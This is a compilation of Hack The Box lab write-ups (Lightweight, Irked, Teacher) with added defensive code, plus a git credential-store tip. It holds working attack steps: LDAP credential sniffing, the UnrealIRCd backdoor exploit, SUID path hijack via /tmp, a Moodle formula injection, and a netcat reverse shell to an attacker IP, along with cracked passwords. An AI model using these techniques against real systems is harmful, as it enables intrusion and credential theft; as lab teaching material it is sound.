drwx------.  4 ldapuser1  ldapuser1  181 Jun 15  2018 ldapuser1
drwx------.  4 ldapuser2  ldapuser2  197 Jun 21  2018 ldapuser2

To get user.txt we have to switch user.
The home directory of “10.10.14.2” offers nothing useful, so we need to become “ldapuser1” or “ldapuser2”.

Using “getcap” we find that /usr/sbin/tcpdump carries cap_net_raw and cap_net_admin in its permitted and effective sets (+ep), so any local user can sniff network traffic without being root.

[10.10.14.4@lightweight ~]$ getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep

Start sniffing on the LDAP port, then request “/status.php” in a browser.
The page performs an LDAP simple bind over plain TCP to the local LDAP server, and the bind request carries the DN and password of “ldapuser2” in cleartext.

[10.10.14.4@lightweight ~]$ tcpdump -i any -X port ldap
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

~~~

18:23:46.631683 IP lightweight.htb.46158 > lightweight.htb.ldap: Flags [P.], seq 1:92, ack 1, win 683, options [nop,nop,TS val 7157713 ecr 7157713], length 91
	0x0000:  4500 008f 8af8 4000 4006 866f 0a0a 0a77  E.....@.@..o...w
	0x0010:  0a0a 0a77 b44e 0185 3d2b bd27 e3f3 b673  ...w.N..=+.'...s
	0x0020:  8018 02ab 2983 0000 0101 080a 006d 37d1  ....)........m7.
	0x0030:  006d 37d1 3059 0201 0160 5402 0103 042d  .m7.0Y...`T....-
	0x0040:  7569 643d 6c64 6170 7573 6572 322c 6f75  uid=ldapuser2,ou
	0x0050:  3d50 656f 706c 652c 6463 3d6c 6967 6874  =People,dc=light
	0x0060:  7765 6967 6874 2c64 633d 6874 6280 2038  weight,dc=htb..8
	0x0070:  6263 3832 3531 3333 3261 6265 3164 3766  bc8251332abe1d7f
	0x0080:  3130 3564 3365 3533 6164 3339 6163 3200  105d3e53ad39ac2.
	0x0090:  0000 0000 0000 0000 0000 0000 0000 00    ...............

~~~

^C
8 packets captured
22 packets received by filter
6 packets dropped by kernel

ldapuser2:8bc8251332abe1d7f105d3e53ad39ac2
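To show exactly what the sniffer caught, here is an added parser (not from the original write-up) that rebuilds the packet from the tcpdump -X lines above, strips the IPv4 and TCP headers, and decodes the LDAP BindRequest as BER: messageID, protocol version, the bind DN and the simple-authentication password, which LDAP sends in cleartext unless STARTTLS or ldaps is used. The hex dump is the one captured above; only the standard library is needed.

```python
# Lines copied from the tcpdump -X capture above (offset, 8 groups of hex, ASCII).
HEXDUMP = """\
0x0000:  4500 008f 8af8 4000 4006 866f 0a0a 0a77  E.....@.@..o...w
0x0010:  0a0a 0a77 b44e 0185 3d2b bd27 e3f3 b673  ...w.N..=+.'...s
0x0020:  8018 02ab 2983 0000 0101 080a 006d 37d1  ....)........m7.
0x0030:  006d 37d1 3059 0201 0160 5402 0103 042d  .m7.0Y...`T....-
0x0040:  7569 643d 6c64 6170 7573 6572 322c 6f75  uid=ldapuser2,ou
0x0050:  3d50 656f 706c 652c 6463 3d6c 6967 6874  =People,dc=light
0x0060:  7765 6967 6874 2c64 633d 6874 6280 2038  weight,dc=htb..8
0x0070:  6263 3832 3531 3333 3261 6265 3164 3766  bc8251332abe1d7f
0x0080:  3130 3564 3365 3533 6164 3339 6163 3200  105d3e53ad39ac2.
0x0090:  0000 0000 0000 0000 0000 0000 0000 00    ...............
"""


def hexdump_to_bytes(dump):
    """Rebuild raw bytes from tcpdump -X output. The hex field has a fixed width
    (39 characters after the two spaces following the offset), so the ASCII
    column is skipped by position rather than by pattern; that avoids mistaking
    ASCII text that happens to look like hex for packet data."""
    out = bytearray()
    for line in dump.splitlines():
        if ":" not in line:
            continue
        rest = line.split(":", 1)[1]
        out += bytes.fromhex(rest[:41].replace(" ", ""))
    return bytes(out)


def tcp_payload(pkt):
    """Strip the IPv4 header (variable IHL) and TCP header (variable data
    offset); the IPv4 total length cuts off any trailing capture padding."""
    ihl = (pkt[0] & 0x0F) * 4
    total = int.from_bytes(pkt[2:4], "big")
    if pkt[9] != 6:
        raise ValueError("not TCP")
    doff = (pkt[ihl + 12] >> 4) * 4
    return pkt[ihl + doff:total]


def ber_tlv(buf, pos):
    """Decode one BER tag-length-value at pos; returns (tag, value, next_pos)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: next n bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def parse_simple_bind(msg):
    """Decode LDAPMessage { messageID, BindRequest { version, name, simple } }.
    Returns None for any other operation or for a SASL bind."""
    tag, body, _ = ber_tlv(msg, 0)
    if tag != 0x30:                        # LDAPMessage is a SEQUENCE
        raise ValueError("not an LDAPMessage")
    tag, mid, pos = ber_tlv(body, 0)       # messageID INTEGER
    tag, op, _ = ber_tlv(body, pos)        # protocolOp
    if tag != 0x60:                        # [APPLICATION 0] BindRequest
        return None
    _, version, pos = ber_tlv(op, 0)
    _, name, pos = ber_tlv(op, pos)
    tag, cred, _ = ber_tlv(op, pos)
    if tag != 0x80:                        # [0] simple; 0xA3 would be [3] sasl
        return None
    return {
        "message_id": int.from_bytes(mid, "big"),
        "version": version[0],
        "name": name.decode("utf-8"),
        "password": cred.decode("utf-8"),
    }


def credentials_from_capture(dump=HEXDUMP):
    """Full pipeline: hex dump -> packet -> TCP payload -> bind credentials."""
    return parse_simple_bind(tcp_payload(hexdump_to_bytes(dump)))


if __name__ == "__main__":
    print(credentials_from_capture())
```

The same decoder applied to a capture of a SASL bind or of an ldaps session would return None, which is the point: the fix for what status.php does is either ldaps:// or ldap_start_tls() before ldap_bind(), not a different password.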

We can switch user with su.
user.txt is in /home/ldapuser2.

[10.10.14.4@lightweight ~]$ su ldapuser2
Password:  # 8bc8251332abe1d7f105d3e53ad39ac2
[ldapuser2@lightweight 10.10.14.4]$
[ldapuser2@lightweight ~]$ cat user.txt
8a866d3bb7e13a57aaeb110297f48026
[ldapuser2@lightweight ~]$ 

3. Getting Root

In /home/ldapuser2 we find some interesting files:

[ldapuser2@lightweight ~]$ ls -l
total 1868
-rw-r--r--. 1 root      root         3411 Jun 14  2018 backup.7z
-rw-rw-r--. 1 ldapuser2 ldapuser2 1520530 Jun 13  2018 OpenLDAP-Admin-Guide.pdf
-rw-rw-r--. 1 ldapuser2 ldapuser2  379983 Jun 13  2018 OpenLdap.pdf
-rw-r--r--. 1 root      root           33 Jun 15  2018 user.txt

Transfer “backup.7z” to our machine. scp over the SSH session would work too, but a copy-and-paste of a base64 encoding (-w0 disables line wrapping) does the job.
First, encode it:

[ldapuser2@lightweight ~]$ base64 -w0 backup.7z 
N3q8ryccAAQmbxM1EA0AAAAAAAAjAAAAAAA...

Then paste and decode on our host, checking that the size (3411 bytes) matches the original:

root@kali:~# echo -n N3q8ryccAAQmbxM1EA0AAAAAAAAjAAAAAA... | base64 -d > backup.7z

root@kali:~# ls -l | grep backup
-rw-r--r-- 1 root root 3411 May 17 21:32 backup.7z

root@kali:~# file backup.7z
backup.7z: 7-zip archive data, version 0.4

Since this backup file is password protected, we have to crack the password.

root@kali:~# 7z x backup.7z

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz (806EA),ASM,AES-NI)

Scanning the drive for archives:
1 file, 3411 bytes (4 KiB)

Extracting archive: backup.7z
--
Path = backup.7z
Type = 7z
Physical Size = 3411
Headers Size = 259
Method = LZMA2:12k 7zAES
Solid = +
Blocks = 1


Enter password (will not be echoed):

We can use “7z2john.pl”, which ships with John the Ripper on Kali.

# install necessary module
root@kali:~# sudo apt-get install libcompress-raw-lzma-perl

# create hash for backup.7z
root@kali:/usr/share/john# ./7z2john.pl /root/backup.7z > /root/backup.7z.hash

# crack the hash with john the ripper
root@kali:~# john backup.7z.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip [SHA256 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 12 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
delete           (backup.7z)
1g 0:00:00:27 DONE (2019-05-17 21:52) 0.03595g/s 75.94p/s 75.94c/s 75.94C/s slimshady..morado
Use the "--show" option to display all of the cracked passwords reliably
Session completed

With the password “delete” we can extract backup.7z.
It contains the site’s PHP files, and status.php holds a hard-coded credential:

root@kali:~# cat status.php 

~~~

<?php
$username = 'ldapuser1';
$password = 'f3ca9d298a553da117442deeb6fa932d';
$ldapconfig['host'] = 'lightweight.htb';
$ldapconfig['port'] = '389';
$ldapconfig['basedn'] = 'dc=lightweight,dc=htb';
//$ldapconfig['usersdn'] = 'cn=users';
$ds=ldap_connect($ldapconfig['host'], $ldapconfig['port']);
ldap_set_option($ds, LDAP_OPT_PROTOCOL_VERSION, 3);
ldap_set_option($ds, LDAP_OPT_REFERRALS, 0);
ldap_set_option($ds, LDAP_OPT_NETWORK_TIMEOUT, 10);

ldapuser1:f3ca9d298a553da117442deeb6fa932d

Switch to ldapuser1 with su:

[10.10.14.4@lightweight ~]$ su ldapuser1
Password: 
[ldapuser1@lightweight 10.10.14.4]$

There are some executables in the home directory:

[ldapuser1@lightweight ~]$ ls -l
total 1484
-rw-rw-r--. 1 ldapuser1 ldapuser1   9714 Jun 15  2018 capture.pcap
-rw-rw-r--. 1 ldapuser1 ldapuser1    646 Jun 15  2018 ldapTLS.php
-rwxr-xr-x. 1 ldapuser1 ldapuser1 555296 Jun 13  2018 openssl
-rwxr-xr-x. 1 ldapuser1 ldapuser1 942304 Jun 13  2018 tcpdump
[ldapuser1@lightweight ~]$ 

The copy of “openssl” in ldapuser1’s home directory has an empty capability list with the effective and permitted flags (“=ep”). In getcap output that means every capability is raised, including cap_dac_override and cap_dac_read_search, so this binary can read (and write) any file regardless of permissions. The write-up only reads root.txt with it; the same capability would also allow writing /etc/passwd or /etc/sudoers for a real root shell.

[ldapuser1@lightweight ~]$ getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
/home/ldapuser1/tcpdump = cap_net_admin,cap_net_raw+ep
/home/ldapuser1/openssl =ep

With it we can read root.txt: openssl base64-encodes the file (using the capability to open it), and we decode the result on the same line.

[ldapuser1@lightweight ~]$ ./openssl base64 -in /root/root.txt | base64 -d
f1d4e309c5a6b3fffff74a8f4b2135fa

Git skip https auth

Environment

  • OS: Kali linux 2019.1
  • Git: 2.20.1

Explanation

How to avoid the credential prompt when accessing a remote repository via HTTPS.
Example:

root@kali:~/1n4r1.github.io# git push origin git-skip-auth
Username for 'https://github.com': 1n4r1
Password for 'https://1n4r1@github.com': 

Solution

We can use a git credential helper.
Since I’m using Kali without a desktop keyring, none of the OS-backed helpers (libsecret, osxkeychain, wincred) is available.
So the credential has to be stored in a file in the home directory with the “store” helper.

git config --global credential.helper store

We have to authenticate once with username/password after this command.
git then writes the credential, in plain text, to ~/.git-credentials:

root@kali:~# cat .git-credentials 
https://1n4r1:SuperStrongFakePassword!!@github.com
root@kali:~#

Now git no longer prompts for credentials.
The caveat: the “store” helper keeps the password in plain text, protected only by the permissions on ~/.git-credentials, so anyone who can read the home directory gets the account. “credential.helper cache” keeps the credential in memory for a limited time instead, and for GitHub a personal access token should be stored rather than the account password (GitHub has not accepted account passwords for HTTPS git operations since August 2021).

Hackthebox Irked Writeup


Explanation

Hack The Box is a website that hosts a set of vulnerable machines on its own VPN. This is a write-up of the machine “Irked” on that website.

Solution

1. Initial Enumeration

Port Scanning:

root@kali:~# nmap -p- 10.10.10.117 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-29 23:55 EET
Nmap scan report for 10.10.10.117
Host is up (0.037s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          38929/tcp  status
|_  100024  1          55964/udp  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
38929/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.62 seconds

Gobuster HTTP:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.117/

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.117/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Timeout      : 10s
=====================================================
2019/04/14 18:02:39 Starting gobuster
=====================================================
/manual (Status: 301)
/server-status (Status: 403)
=====================================================
2019/04/14 18:15:34 Finished
=====================================================

2. Getting User

nmap does not report a version, but searching Exploit Database for UnrealIRCd turns up the well-known 3.2.8.1 backdoor (CVE-2010-2075), which is worth trying first.

root@kali:~# searchsploit unrealirc
--------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                         |  Path
                                                                                       | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------- ----------------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)                           | exploits/linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow                                | exploits/windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                                         | exploits/linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                                              | exploits/windows/dos/27407.pl
--------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

To run the exploit, launch the Metasploit console.

msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor 
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhost 10.10.10.117
rhost => 10.10.10.117
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
rport => 6697
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP double handler on 10.10.14.23:4444 
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
    :irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Uccg9OJybaPvTmSP;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Uccg9OJybaPvTmSP\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.23:4444 -> 10.10.10.117:51673) at 2019-04-14 17:49:40 +0300

id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)

In the directory “/home/djmardov/Documents”, we can find user.txt and an interesting file, “.backup”.
Since we are not the user djmardov, we do not have permission to read user.txt.

pwd
/home/djmardov/Documents
ls -la
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3 04:40 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt

It seems that the content of .backup is a password for steganography.

cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

On the top page served on port 80, we can find an image file, “irked.jpg”.

We can use this website to extract the hidden data from irked.jpg.
The extracted data is “Kab6h+m+bbp2J:HG”.

djmardov:Kab6h+m+bbp2J:HG

We can use the credentials above to connect over SSH.

root@kali:~# ssh djmardov@10.10.10.117
djmardov@10.10.10.117's password: 

~~~

Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$ 

Unlike on other boxes, user.txt is in the directory “Documents”.

djmardov@irked:~$ cat Documents/user.txt
4a66a78b12dc0e661a59d3f5c0267a8e

3. Getting Root

By enumerating the system, we can find some binaries with the SUID bit set.

djmardov@irked:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

We can see an unusual binary, “viewuser”.

djmardov@irked:~$ /usr/bin/viewuser 
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2019-04-11 15:02 (:0)
djmardov pts/0        2019-04-14 11:05 (10.10.14.23)
sh: 1: /tmp/listusers: not found

It seems that viewuser runs “/tmp/listusers” through the shell, and that file does not exist yet.
So we put a command into “/tmp/listusers” and confirm that it is executed.

djmardov@irked:~$ echo /bin/bash > /tmp/listusers
djmardov@irked:~$ chmod 777 /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser 
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2019-04-23 17:05 (:0)
djmardov pts/0        2019-04-27 15:35 (10.10.14.23)
root@irked:~#
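The flaw above is that a SUID binary hands a fixed path under /tmp to the shell, and /tmp is writable by every local user. As an added example that is not part of the write-up or the box, the following shell functions implement the check such a program should make before executing a helper: no directory on the way up to the root (or up to an assumed STOP directory, used here so the check can be tried on a scratch tree) may be world-writable, and the helper must exist and not be world-writable itself. The function names and the STOP argument are assumptions of this example.

```shell
#!/bin/sh
# Added example (not code from the box): the check a privileged program such as
# viewuser should perform before handing a fixed helper path like /tmp/listusers
# to the shell. The function names and the optional STOP directory are
# assumptions made for this example.
set -e

# other_writable PATH: succeed if "others" have write permission on PATH.
# The 9th character of the ls -ld mode string is the other-write bit.
other_writable() {
    [ "$(ls -ld "$1" | cut -c9)" = "w" ]
}

# helper_path_is_safe PATH [STOP]
# Succeed only if PATH is an existing regular file that is not world-writable and
# no directory between it and STOP (default "/") is world-writable. A missing
# file under a world-writable directory is exactly the situation exploited above:
# any local user can create it.
helper_path_is_safe() {
    p=$1
    stop=${2:-/}
    d=$(dirname "$p")
    while :; do
        if other_writable "$d"; then
            echo "unsafe: $d is world-writable, any local user could plant $p" >&2
            return 1
        fi
        [ "$d" = "$stop" ] && break
        [ "$d" = "/" ] && break
        d=$(dirname "$d")
    done
    if [ ! -f "$p" ]; then
        echo "unsafe: $p does not exist" >&2
        return 1
    fi
    if other_writable "$p"; then
        echo "unsafe: $p itself is world-writable" >&2
        return 1
    fi
    return 0
}

# Usage: helper_path_is_safe /tmp/listusers   (fails on any normal system, at /tmp itself)
```

Running the check against /tmp/listusers fails at /tmp itself, which is why the design of viewuser is unsafe regardless of whether the helper file exists: the only acceptable place for a helper run with root privileges is a root-owned directory that nobody else can write to.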

root.txt is in the directory “/root/”.

root@irked:~# cat /root/root.txt
8d8e9e8be64654b6dccc3bff4522daf3

Hackthebox Teacher Writeup


Explanation

Hackthebox is a website which has a bunch of vulnerable machines in its own VPN. This is a write-up of the machine “Teacher” on that website.

Solution

1. Initial Enumeration

Port Scanning:

root@kali:# nmap -p- 10.10.10.153 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-15 23:12 EET
Nmap scan report for 10.10.10.153
Host is up (0.035s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.90 seconds

Gobuster HTTP:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.153
 
=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.153/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Timeout      : 10s
=====================================================
2019/02/16 09:41:51 Starting gobuster
=====================================================
/images (Status: 301)
/css (Status: 301)
/manual (Status: 301)
/js (Status: 301)
/javascript (Status: 301)
/fonts (Status: 301)
/phpmyadmin (Status: 403)
/moodle (Status: 301)
/server-status (Status: 403)
=====================================================
2019/02/16 09:56:06 Finished
=====================================================

Gobuster HTTP “/moodle”:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.153/moodle/

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.153/moodle/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Timeout      : 10s
=====================================================
2019/02/26 17:29:39 Starting gobuster
=====================================================
/search (Status: 301)
/blog (Status: 301)
/rss (Status: 301)
/login (Status: 301)
/media (Status: 301)
/files (Status: 301)
/user (Status: 301)
/calendar (Status: 301)
/admin (Status: 301)
/comment (Status: 301)
/report (Status: 301)
/local (Status: 301)
/pix (Status: 301)
/tag (Status: 301)
/group (Status: 301)
/my (Status: 301)
/install (Status: 301)
/lib (Status: 301)
/portfolio (Status: 301)
/cache (Status: 301)
/notes (Status: 301)
/message (Status: 301)
/lang (Status: 301)
/theme (Status: 301)
/blocks (Status: 301)
/question (Status: 301)
/backup (Status: 301)
/rating (Status: 301)
/filter (Status: 301)
/mod (Status: 301)
/auth (Status: 301)
/course (Status: 301)
/error (Status: 301)
/badges (Status: 301)
/repository (Status: 301)
/analytics (Status: 301)
/availability (Status: 301)
/webservice (Status: 301)
/plagiarism (Status: 301)
/competency (Status: 301)
=====================================================
2019/02/26 17:44:31 Finished
=====================================================

2. Getting User

As we can see, Moodle is running on this server. We can log in to Moodle as a guest user, but there is no interesting information there.
By enumerating some other pages, we find a strange image on “/gallery.html”. What we can observe is that:

  1. There is an image tag whose source file exists, but the image itself is not displayed.
  2. The tag carries an unexplained message that says “That’s an F”.

By fetching it with curl, we can see what the content of 5.png actually is.

root@kali:~# curl http://10.10.10.153/images/5.png
Hi Servicedesk,

I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.

Could you guys figure out what the last charachter is, or just reset it?

Thanks,
Giovanni

According to this information, the username we can expect is “Giovanni”,
and the password consists of “Th4C00lTheacha” plus one character.

We can use this information to log in to the Moodle admin console.
First, we have to create a list of the possible passwords.

#!/usr/bin/python3
# Build the candidate list: the known prefix followed by every ASCII letter,
# digit and punctuation character (94 candidates in total).

import string

PASS = "Th4C00lTheacha"

chars = string.ascii_letters + string.digits + string.punctuation

with open("./password.txt", "w") as f:
    for c in chars:
        f.write(PASS + c + "\n")
# The "with" block closes the file automatically, so no explicit f.close() is needed.

Running the script above gives us the list of possible passwords.
Then we run a dictionary attack against the login form.
We can use “wfuzz” for this purpose.

root@kali:~# wfuzz -w ./password.txt --hh 440 -t 20 -d "anchor=&username=giovanni&password=FUZZ" http://10.10.10.153/moodle/login/index.php

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.153/moodle/login/index.php
Total requests: 94

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000065:  C=303      6 L	      34 W	    454 Ch	  "Th4C00lTheacha#"

Total time: 11.37637
Processed Requests: 94
Filtered Requests: 93
Requests/sec.: 8.262736

The --hh 440 option hides every response of 440 characters, which is the size of the failed-login responses here, so the only line shown is the successful attempt. This means we have the following credentials for Moodle.

giovanni:Th4C00lTheacha#


Then click on Algebra, the settings button, and “More…”.

Click “questions” and “create a new question”.

Then click “Calculated” and “Add”.
Enter the following values, save the changes and click “Next page”.

Question name: baa
Question text: foo
Formula: /*{a*/`$_GET[0]`;//{x}}
Grade: 100%


By sending the following request from the web browser, we get a reverse shell.

# current page url + &0=(date;nc -e /bin/bash 10.10.14.23 443) 
http://10.10.10.153/moodle/question/question.php?returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2&appendqnumstring&scrollpos=0&id=7&wizardnow=datasetitems&courseid=2&0=(date;nc%20-e%20/bin/bash%2010.10.14.23%20443)
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.153] 48136
ls
addquestion.php
behaviour
category.php
category_class.php
category_form.php

~~~

Then spawn a full TTY shell.

root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.153] 48144
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@teacher:/var/www/html/moodle/question$ 

By enumerating Teacher as the www-data user, we can find MariaDB credentials in “/var/www/html/moodle/config.php”.

www-data@teacher:/var/www/html/moodle$ cat config.php
cat config.php
<?php  // Moodle configuration file

unset($CFG);
global $CFG;
$CFG = new stdClass();

$CFG->dbtype    = 'mariadb';
$CFG->dblibrary = 'native';
$CFG->dbhost    = 'localhost';
$CFG->dbname    = 'moodle';
$CFG->dbuser    = 'root';
$CFG->dbpass    = 'Welkom1!';
$CFG->prefix    = 'mdl_';

~~~

In the “moodle” database in MariaDB, we can find a password hash for each user.
One of them stands out from the others.

MariaDB [moodle]> select username, password FROM mdl_user;
select username, password FROM mdl_user;
+-------------+--------------------------------------------------------------+
| username    | password                                                     |
+-------------+--------------------------------------------------------------+
| guest       | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |
| admin       | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |
| giovanni    | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |
| Giovannibak | 7a860966115182402ed06375cf0a22af                             |
+-------------+--------------------------------------------------------------+
4 rows in set (0.00 sec)

With hash-identifier, we can figure out that this is MD5.

root@kali:~# hash-identifier 
   #########################################################################
   #	 __  __ 		    __		 ______    _____	   #
   #	/\ \/\ \		   /\ \ 	/\__  _\  /\  _ `\	   #
   #	\ \ \_\ \     __      ____ \ \ \___	\/_/\ \/  \ \ \/\ \	   #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R #
   #							www.Blackploit.com #
   #						       Root@Blackploit.com #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: 7a860966115182402ed06375cf0a22af

Possible Hashs:
[+]  MD5
[+]  Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

~~~

Crack this hash with John the Ripper. The password is “expelled”.
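The “Giovannibak” row is easy to spot by eye in a four-user table; on a real site a defender would want to find such rows automatically. As an added example, not part of the write-up, the following shell functions classify each stored hash and list the accounts that are not on bcrypt (the $2y$ hashes Moodle writes), so that they can be reset. The sample input reuses the rows of the mdl_user table above; the function names and the “username hash” line format are assumptions of this example.

```shell
#!/bin/sh
# Added example (not part of the write-up): audit a dump of Moodle's mdl_user
# table for accounts whose stored password is not a bcrypt hash. Moodle writes
# $2y$ bcrypt hashes; a bare 32-hex value is a legacy unsalted MD5 that should
# be reset. Function names and the input format ("username hash" per line) are
# assumptions made for this example.

# classify_hash HASH: print bcrypt, legacy-md5 or unknown.
classify_hash() {
    case $1 in
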